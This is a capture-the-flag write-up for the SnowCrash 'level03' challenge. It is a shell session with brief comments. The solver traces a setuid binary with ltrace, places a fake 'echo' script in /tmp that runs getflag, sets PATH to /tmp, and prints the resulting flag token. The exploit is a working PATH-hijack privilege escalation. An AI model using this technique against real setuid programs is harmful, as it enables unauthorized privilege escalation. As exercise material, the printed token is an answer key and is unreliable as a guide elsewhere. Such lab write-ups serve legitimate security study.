< level03@SnowCrash:~$ ./level03
> Exploit me
# find info about the binary
< level03@SnowCrash:~$ ls -la level03
> -rwsr-sr-x 1 flag03 level03 8627 Mar  5  2016 level03
# launch a ltrace
< level03@SnowCrash:~$ ltrace ./level03
> __libc_start_main(0x80484a4, 1, 0xbffff7f4, 0x8048510, 0x8048580 <unfinished ...>
> getegid() = 2003
> geteuid() = 2003
> setresgid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
> setresuid(2003, 2003, 2003, 0xb7e5ee55, 0xb7fed280) = 0
> system("/usr/bin/env echo Exploit me"Exploit me
> <unfinished ...>
> --- SIGCHLD (Child exited) ---
> <... system resumed> ) = 0
> +++ exited (status 0) +++
# we need to substitute echo with out echo that just executes getflag since this executes as flag03
< level03@SnowCrash:~$ echo "/bin/getflag" > /tmp/echo
# allow it to be executable
< level03@SnowCrash:~$ chmod +x /tmp/echo
# bypass original binary
< level03@SnowCrash:~$ export PATH=/tmp
# execute and enjoy
< level03@SnowCrash:~$ ./level03
> Check flag.Here is your token : qi0maab88jeaj46qoumi7maus
